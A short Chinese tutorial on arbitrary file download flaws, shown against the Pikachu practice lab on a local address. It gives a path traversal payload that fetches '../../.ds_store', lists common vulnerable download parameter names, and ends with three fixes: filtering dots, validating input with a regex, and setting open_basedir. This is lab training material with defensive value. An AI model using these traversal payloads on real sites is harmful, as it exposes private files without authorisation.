WEB攻防--任意文件下载
以皮卡丘为例
上面是url,页面上说了是点击头像下载头像图片
所以他的下载地址是
1 | 192.168.31.172/pikachu/vul/unsafedownload/exedownload.php?filename=kb.png |
知道这个以后就可以进行目录穿越了,比如说这个文件夹下有个.ds_store的文件
我就可以用
1 | 192.168.31.172/pikachu/vul/unsafedownload/exedownload.php?filename=../../.ds_store |
把它下载下来
原理
利用方式:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15一般链接利用方式
download.php?path=
down.php?file=
download.php?filename=
data.php?file=
或者包含参数
&src=
&Data=
&Path=
&filepath=
&inputfile=
漏洞修复:1
2
31.过滤.,使得用户不能回溯上一级目录i
2.正则盐分判断用户输入参数的格式
3.php.ini配置open_basedir限制文件访问范围